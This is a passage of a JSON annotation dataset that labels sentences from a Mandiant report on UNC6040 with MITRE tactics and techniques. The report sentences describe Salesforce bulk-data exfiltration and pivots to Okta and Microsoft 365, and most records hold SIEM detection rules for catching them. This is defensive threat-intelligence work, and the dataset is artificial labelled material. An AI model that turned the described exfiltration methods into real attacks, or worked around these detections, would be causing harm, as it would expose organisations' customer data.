Salesforce activities for each TTP are as follows:\nSaaS Applications Detections While native SIEM threat detections provide some protection, they often lack the centralized visibility needed to connect disparate events across a complex environment.", "sentence_text": "By developing custom targeted detection rules, organizations can proactively detect malicious activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s120-f87937", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "By developing custom targeted detection rules, organizations can proactively detect malicious activities.", "sentence_text": "Data Exfiltration & Cross-SaaS Lateral Movement (Post-Authorization)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s121-b67668", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "Data Exfiltration & Cross-SaaS Lateral Movement (Post-Authorization)", "sentence_text": "MITRE Mapping: TA0010 - Exfiltration & TA0008 - Lateral Movement Scenario & Objectives After an user authorizes a (malicious or spoofed)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s122-c54143", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "MITRE Mapping: TA0010 - Exfiltration & TA0008 - Lateral Movement Scenario & Objectives After an user authorizes a (malicious or spoofed)", "sentence_text": "Connected App, UNC6040 typically:\nPerforms data exfiltration quickly (REST pagination bursts, Bulk API downloads, lards/sensitive report exports).", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Perform rapid data exfiltration using REST pagination, Bulk API downloads, and report exports.", "entities": [ { "text": "UNC6040", "start": 15, "end": 22, "label": "ThreatActor" }, { "text": "Performs data exfiltration quickly (REST pagination bursts, Bulk API downloads, lards/sensitive report exports)", "start": 34, "end": 145, "label": "Action" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s123-63b969", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "Connected App, UNC6040 typically:\nPerforms data exfiltration quickly (REST pagination bursts, Bulk API downloads, lards/sensitive report exports).", "sentence_text": "Pivots to Okta/Microsoft 365 from the same risky egress IP to expand access and steal more data.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" }, { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "Pivot to Okta and Microsoft 365 using the same egress IP to expand access and steal additional data.", "entities": [ { "text": "Pivots to Okta/Microsoft 365 from the same risky egress IP to expand access and steal more data", "start": 0, "end": 95, "label": "Action" }, { "text": "Okta/Microsoft 365", "start": 10, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-31_mandiant_report-p1-s124-d1e361", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "Pivots to Okta/Microsoft 365 from the same risky egress IP to expand access and steal more data.", "sentence_text": "Baseline & Allowlist Re-use the lists you already maintain for the vishing phase and add two regex helpers for content focus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s125-b9e692", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "Baseline & Allowlist Re-use the lists you already maintain for the vishing phase and add two regex helpers for content focus.", "sentence_text": "Why high-fidelity: Matches UNC6040’s “approve → drain” pattern; tight window + volume thresholds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s126-a40b79", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "Why high-fidelity: Matches UNC6040’s “approve → drain” pattern; tight window + volume thresholds.", "sentence_text": "Key signals:\nOAuth success (unknown app OR allowlisted+risky egress), bind on user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s127-a6f835", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "Key signals:\nOAuth success (unknown app OR allowlisted+risky egress), bind on user.", "sentence_text": "$oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s128-cda1bf", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "$oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )", "sentence_text": "$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$bulk.metadata.product_name = \"SALESFORCE\" $bulk.metadata.log_type = \"SALESFORCE\" $bulk.metadata.product_event_type = \"BulkApiResultEvent\" $uid = coalesce($bulk.principal.user.userid, $bulk.extracted.fields[\"UserId\"])\nmatch:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s129-044f31", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$bulk.metadata.product_name = \"SALESFORCE\" $bulk.metadata.log_type = \"SALESFORCE\" $bulk.metadata.product_event_type = \"BulkApiResultEvent\" $uid = coalesce($bulk.principal.user.userid, $bulk.extracted.fields[\"UserId\"])\nmatch:", "sentence_text": "$uid over 10m Or $oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )\n$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$api.metadata.product_name = \"SALESFORCE\" $api.metadata.log_type = \"SALESFORCE\" $api.metadata.product_event_type = \"ApiEventStream\" $uid = coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"])\nmatch:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s130-16d1c4", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "$uid over 10m Or $oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )\n$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$api.metadata.product_name = \"SALESFORCE\" $api.metadata.log_type = \"SALESFORCE\" $api.metadata.product_event_type = \"ApiEventStream\" $uid = coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"])\nmatch:", "sentence_text": "$uid over 10m Or $oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )\n$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$report.metadata.product_name = \"SALESFORCE\" $report.metadata.log_type = \"SALESFORCE\" $report.metadata.product_event_type = \"ReportEventStream\" strings.to_lower(coalesce($report.extracted.fields[\"ReportName\"], \"\")) in regex SENSITIVE_REPORT_REGEX $uid = coalesce($report.principal.user.userid, $report.extracted.fields[\"UserId\"])\nmatch:\n$uid over 10m Note:\nSingle event rule can also be used instead of multi-event rules in this case where only the Product Event Types like ApiEventStream, BulkApiResultEvent, ReportEventStream can be used as a single event rule to be monitored.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s131-42a086", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "$uid over 10m Or $oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS ) ) )\n$uid = coalesce($oauth.principal.user.userid, $oauth.extracted.fields[\"UserId\"])\n$report.metadata.product_name = \"SALESFORCE\" $report.metadata.log_type = \"SALESFORCE\" $report.metadata.product_event_type = \"ReportEventStream\" strings.to_lower(coalesce($report.extracted.fields[\"ReportName\"], \"\")) in regex SENSITIVE_REPORT_REGEX $uid = coalesce($report.principal.user.userid, $report.extracted.fields[\"UserId\"])\nmatch:\n$uid over 10m Note:\nSingle event rule can also be used instead of multi-event rules in this case where only the Product Event Types like ApiEventStream, BulkApiResultEvent, ReportEventStream can be used as a single event rule to be monitored.", "sentence_text": "But, care has to be taken if a single event rule is established as these can be very noisy, and thus the reference lists should be actively monitored.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s132-ccc13e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "But, care has to be taken if a single event rule is established as these can be very noisy, and thus the reference lists should be actively monitored.", "sentence_text": "Bulk API Large Result Download (Non-Integration User)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s133-a4a5a3", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "Bulk API Large Result Download (Non-Integration User)", "sentence_text": "Bulk API/Bulk v2 result download above threshold by a human user.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s134-b34c01", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Bulk API/Bulk v2 result download above threshold by a human user.", "sentence_text": "Why high-fidelity: Clear exfil artifact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s135-399ecc", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "Why high-fidelity: Clear exfil artifact.", "sentence_text": "Key signals: BulkApiResultEvent, user not in KNOWN_INTEGRATION_USERS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s136-e9fa8e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "Key signals: BulkApiResultEvent, user not in KNOWN_INTEGRATION_USERS.", "sentence_text": "Lists/knobs: KNOWN_INTEGRATION_USERS, size threshold.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s137-369082", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "Lists/knobs: KNOWN_INTEGRATION_USERS, size threshold.", "sentence_text": "$e.metadata.product_name = \"SALESFORCE\" $e.metadata.log_type = \"SALESFORCE\" $e.metadata.product_event_type = \"BulkApiResultEvent\" not (coalesce($e.principal.user.userid, $e.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nREST Query Pagination Burst (query/queryMore)\nHigh-rate query*/queryMore calls over a short window.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s138-cb035d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "$e.metadata.product_name = \"SALESFORCE\" $e.metadata.log_type = \"SALESFORCE\" $e.metadata.product_event_type = \"BulkApiResultEvent\" not (coalesce($e.principal.user.userid, $e.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nREST Query Pagination Burst (query/queryMore)\nHigh-rate query*/queryMore calls over a short window.", "sentence_text": "Why high-fidelity: Mimics scripted drains; steady human usage won’t hit burst thresholds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s139-f4b966", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Why high-fidelity: Mimics scripted drains; steady human usage won’t hit burst thresholds.", "sentence_text": "Lists/knobs: burst threshold, KNOWN_INTEGRATION_USERS.\n$api.metadata.product_name = \"SALESFORCE\" $api.metadata.log_type = \"SALESFORCE\" $api.metadata.product_event_type = \"ApiEventStream\" not (coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nstrings.to_lower(coalesce($api.extracted.fields[\"Operation\"], \"\")) in regex `(?i)^(query|querymore|query_all|queryall)$` $uid = coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"])\nSensitive Report Export by Non-Integration User Exports of large or sensitive-named reports by a human.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s140-c8c17c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "Lists/knobs: burst threshold, KNOWN_INTEGRATION_USERS.\n$api.metadata.product_name = \"SALESFORCE\" $api.metadata.log_type = \"SALESFORCE\" $api.metadata.product_event_type = \"ApiEventStream\" not (coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nstrings.to_lower(coalesce($api.extracted.fields[\"Operation\"], \"\")) in regex `(?i)^(query|querymore|query_all|queryall)$` $uid = coalesce($api.principal.user.userid, $api.extracted.fields[\"UserId\"])\nSensitive Report Export by Non-Integration User Exports of large or sensitive-named reports by a human.", "sentence_text": "Why high-fidelity: Report extracts are a common, noisy-to-attackers but high-signal vector.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s141-03c373", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Why high-fidelity: Report extracts are a common, noisy-to-attackers but high-signal vector.", "sentence_text": "Lists/knobs: SENSITIVE_REPORT_REGEX, KNOWN_INTEGRATION_USERS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s142-6d9f38", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "Lists/knobs: SENSITIVE_REPORT_REGEX, KNOWN_INTEGRATION_USERS.", "sentence_text": "$e.metadata.product_name = \"SALESFORCE\" $e.metadata.log_type = \"SALESFORCE\" $e.metadata.product_event_type = \"ReportEventStream\" not (coalesce($e.principal.user.userid, $e.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nstrings.to_lower(coalesce($e.extracted.fields[\"ReportName\"], \"\")) in regex %SENSITIVE_REPORT_REGEX", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s143-9bcdf8", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "$e.metadata.product_name = \"SALESFORCE\" $e.metadata.log_type = \"SALESFORCE\" $e.metadata.product_event_type = \"ReportEventStream\" not (coalesce($e.principal.user.userid, $e.extracted.fields[\"UserId\"]) in %KNOWN_INTEGRATION_USERS)\nstrings.to_lower(coalesce($e.extracted.fields[\"ReportName\"], \"\")) in regex %SENSITIVE_REPORT_REGEX", "sentence_text": "Salesforce OAuth → Okta/M365 Login From Same Risky IP in ≤60 Minutes (Multi-Event)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s144-e869b6", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "Salesforce OAuth → Okta/M365 Login From Same Risky IP in ≤60 Minutes (Multi-Event)", "sentence_text": "Suspicious Salesforce OAuth followed within 60m by Okta or Entra ID login from the same public IP, where the IP is off-corp or VPN/Tor ASN.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s145-44a1d0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "Suspicious Salesforce OAuth followed within 60m by Okta or Entra ID login from the same public IP, where the IP is off-corp or VPN/Tor ASN.", "sentence_text": "Why high-fidelity: Ties the attacker’s egress IP across SaaS within a tight window.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s146-be7d39", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "Why high-fidelity: Ties the attacker’s egress IP across SaaS within a tight window.", "sentence_text": "Key signals:\nSalesforce OAuth posture (unknown app OR allowlisted+risky egress)\nOKTA* or OFFICE_365 USER_LOGIN from the same IP Lists/knobs: ENTERPRISE_EGRESS_CIDRS, VPN_TOR_ASNS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s147-7d7b09", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "Key signals:\nSalesforce OAuth posture (unknown app OR allowlisted+risky egress)\nOKTA* or OFFICE_365 USER_LOGIN from the same IP Lists/knobs: ENTERPRISE_EGRESS_CIDRS, VPN_TOR_ASNS.", "sentence_text": "(Optional sibling rule binding by user email if identities are normalized.)\n$oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s148-d52255", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "(Optional sibling rule binding by user email if identities are normalized.)\n$oauth.metadata.product_name = \"SALESFORCE\" $oauth.metadata.log_type = \"SALESFORCE\" $oauth.extracted.fields[\"LoginType\"] = \"Remote Access 2.0\" ($oauth.extracted.fields[\"Status\"] = \"Success\" or $oauth.security_result.action_details = \"Success\")\n( not ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nor ( ($app in %ALLOWLIST_CONNECTED_APP_NAMES)\nand ( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS )", "sentence_text": "$ip = coalesce($oauth.principal.asset.ip, $oauth.principal.ip)\n$okta.metadata.log_type in \"OKTA\" $okta.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($okta.principal.asset.ip, $okta.principal.ip) = $ip $o365.metadata.log_type = \"OFFICE_365\" $o365.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($o365.principal.asset.ip, $o365.principal.ip)\nmatch:\n$ip over 10m M365 Graph Data-Pull After Risky Login Entra ID login from risky egress followed by Microsoft Graph endpoints that pull mail/files/reports.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s149-b55519", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "$ip = coalesce($oauth.principal.asset.ip, $oauth.principal.ip)\n$okta.metadata.log_type in \"OKTA\" $okta.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($okta.principal.asset.ip, $okta.principal.ip) = $ip $o365.metadata.log_type = \"OFFICE_365\" $o365.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($o365.principal.asset.ip, $o365.principal.ip)\nmatch:\n$ip over 10m M365 Graph Data-Pull After Risky Login Entra ID login from risky egress followed by Microsoft Graph endpoints that pull mail/files/reports.", "sentence_text": "Why high-fidelity: Captures post-login data access typical in account takeovers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s150-0a6c16", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "Why high-fidelity: Captures post-login data access typical in account takeovers.", "sentence_text": "Key signals: OFFICE_365 USER_LOGIN with off-corp IP or VPN/Tor ASN, then HTTP to URLs matching M365_SENSITIVE_GRAPH_REGEX by the same account within hours.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s151-a39a49", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "Key signals: OFFICE_365 USER_LOGIN with off-corp IP or VPN/Tor ASN, then HTTP to URLs matching M365_SENSITIVE_GRAPH_REGEX by the same account within hours.", "sentence_text": "$login.metadata.log_type = \"OFFICE_365\" $login.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($login.principal.asset.ip, $login.principal.ip)\n( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS )\n$acct = coalesce($login.principal.user.userid, $login.principal.user.email_addresses)\n$http.metadata.product_name in (\"Entra ID\",\"Microsoft\")\n($http.metadata.event_type = \"NETWORK_HTTP\" or $http.target.url !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s152-b0629c", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "$login.metadata.log_type = \"OFFICE_365\" $login.metadata.event_type = \"USER_LOGIN\" $ip = coalesce($login.principal.asset.ip, $login.principal.ip)\n( not ($ip in cidr %ENTERPRISE_EGRESS_CIDRS)\nor strings.concat(ip_to_asn($ip), \"\") in %VPN_TOR_ASNS )\n$acct = coalesce($login.principal.user.userid, $login.principal.user.email_addresses)\n$http.metadata.product_name in (\"Entra ID\",\"Microsoft\")\n($http.metadata.event_type = \"NETWORK_HTTP\" or $http.target.url !", "sentence_text": "= \"\")\n$acct = coalesce($http.principal.user.userid, $http.principal.user.email_addresses)\nstrings.to_lower(coalesce($http.target.url, \"\"))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s153-c3fe14", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "= \"\")\n$acct = coalesce($http.principal.user.userid, $http.principal.user.email_addresses)\nstrings.to_lower(coalesce($http.target.url, \"\"))", "sentence_text": "in regex %M365_SENSITIVE_GRAPH_REGEX match:\n$acct over 30m Tuning & Exceptions Identity joins - The lateral rule groups by IP for robustness.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s154-5081e3", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "in regex %M365_SENSITIVE_GRAPH_REGEX match:\n$acct over 30m Tuning & Exceptions Identity joins - The lateral rule groups by IP for robustness.", "sentence_text": "If you have strong identity normalization (Salesforce <-> Okta <-> M365), clone it and match on user email instead of IP.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s155-d58b69", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "If you have strong identity normalization (Salesforce <-> Okta <-> M365), clone it and match on user email instead of IP.", "sentence_text": "Change windows - Suppress time-bound rules during approved data migrations/Connected App onboarding (temporarily add vendor app to ALLOWLIST_CONNECTED_APP_NAMES)\nIntegration accounts - Keep KNOWN_INTEGRATION_USERS current; most noise in exfil rules comes from scheduled ETL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s156-65072d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "Change windows - Suppress time-bound rules during approved data migrations/Connected App onboarding (temporarily add vendor app to ALLOWLIST_CONNECTED_APP_NAMES)\nIntegration accounts - Keep KNOWN_INTEGRATION_USERS current; most noise in exfil rules comes from scheduled ETL.", "sentence_text": "Egress hygiene - Keep ENTERPRISE_EGRESS_CIDRS current; stale NAT/VPN ranges inflate VPN/Tor findings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s157-953d06", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 157, "context_before": "Egress hygiene - Keep ENTERPRISE_EGRESS_CIDRS current; stale NAT/VPN ranges inflate VPN/Tor findings.", "sentence_text": "IOC-Based Detections\nScenario & Objectives A malicious threat actor has either successfully accessed or attempted to access an organization's network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s158-fca6a0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 158, "context_before": "IOC-Based Detections\nScenario & Objectives A malicious threat actor has either successfully accessed or attempted to access an organization's network.", "sentence_text": "The objective is to detect the presence of known UNC6040 IOCs in the environment based on all of the available logs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s159-adb2af", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 159, "context_before": "The objective is to detect the presence of known UNC6040 IOCs in the environment based on all of the available logs.", "sentence_text": "Reference Lists\nReference lists organizations should maintain:\nSTRING\nUNC6040_IOC_LIST", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s160-eba428", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 160, "context_before": "Reference Lists\nReference lists organizations should maintain:\nSTRING\nUNC6040_IOC_LIST", "sentence_text": "(IP addresses from threat intel sources eg. VirusTotal)\nList of indicators of compromise (IOCs)\nHigh Fidelity Detection Catalog (Pseudo-Code)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s161-0d97ff", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "(IP addresses from threat intel sources eg. VirusTotal)\nList of indicators of compromise (IOCs)\nHigh Fidelity Detection Catalog (Pseudo-Code)", "sentence_text": "UNC6040 IP_IoC Detected A known IOC associated with UNC6040 was detected in the organization's environment either from a source or destination connection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s162-1c9104", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 162, "context_before": "UNC6040 IP_IoC Detected A known IOC associated with UNC6040 was detected in the organization's environment either from a source or destination connection.", "sentence_text": "High-fidelity when conditioned on source or destination IP address matches a known UNC6040 IOC.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 